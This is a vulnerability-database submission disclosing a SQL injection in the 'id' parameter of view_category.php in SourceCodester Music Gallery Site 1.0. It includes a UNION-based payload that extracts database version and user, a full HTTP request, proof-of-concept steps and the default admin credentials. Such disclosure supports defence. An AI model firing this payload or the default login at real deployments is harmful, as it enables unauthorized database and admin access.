| Title | SourceCodester Music Gallery Site 1.0 : GET Request based sql injection at view_category.php |
|---|
| Description | ## Vendor Homepage:
https://www.sourcecodester.com
## Software Link:
https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html
## Version:
v 1.0
## Vulnerable URL:
/php-music/admin/categories/view_category.php?id=
## Payload :
view_category.php?id=1%27+and+false+union+select+1,version(),user(),4,5,6,7--+-
## Affected page:
On the page "view_category.php", the parameter "id" is vulnerable to SQL Injection
## Description:
In Music Gallery site , after login as admin ,under the categories list . By updating the music category and intercepting the request upon clicking on view ,the GET request "id" parameter is vulnerable to SQL Injection.
## Proof of concept
1. click on the admin panel and login with the credentials.
the admin credentials are username:admin & password admin123
2. browse to categories list.
3. click on actions and view option.
4. intercept the traffic through burp and get the actual URL
5. add the payload "%27+and+false+union+select+1,version(),user(),4,5,6,7--+-" to the "id"parameter
Request
-------
GET /php-music/admin/categories/view_category.php?id=1%27+and+false+union+select+1,version(),user(),4,5,6,7--+- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/php-music/admin/?page=categories
Cookie: PHPSESSID=pkk15gn7r4j3nrksvms44fd15t
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
|
|---|
| User | Anonymous User |
|---|
| Submission | 02/27/2023 11:03 (3 years ago) |
|---|
| Moderation | 02/27/2023 11:43 (40 minutes later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 221819 [SourceCodester Music Gallery Site 1.0 view_category.php ID sql injection] |
|---|
| Points | 17 |
|---|